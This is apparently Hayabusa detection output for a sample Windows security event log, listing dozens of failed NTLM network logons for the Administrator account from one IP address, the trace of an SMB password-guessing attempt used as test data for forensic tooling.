NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ZZfs8zqT2bLOAHq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkpO31LzJfaYLyjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJrIsRTWUwPuySR7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHNccqtwl9Y9IhLq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: APlvDcMzvms0gehT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: AxOERGKI75RarVNZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uvzwd5qqC7og49yW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lksm3o2g0YhFnm4Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zwXhSPCV4qHVF9Rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z31baZ4G36idFMeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK63qylKunHZB3zS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALJxKGwyZz7JDpRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8tioTO3TEIzdzY0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5dIKTgQkvPKzKJoZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ta0IMrlArbgONhDG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MKNUu4624Rvr87kK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n7jIL2FkXzWqvWTJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
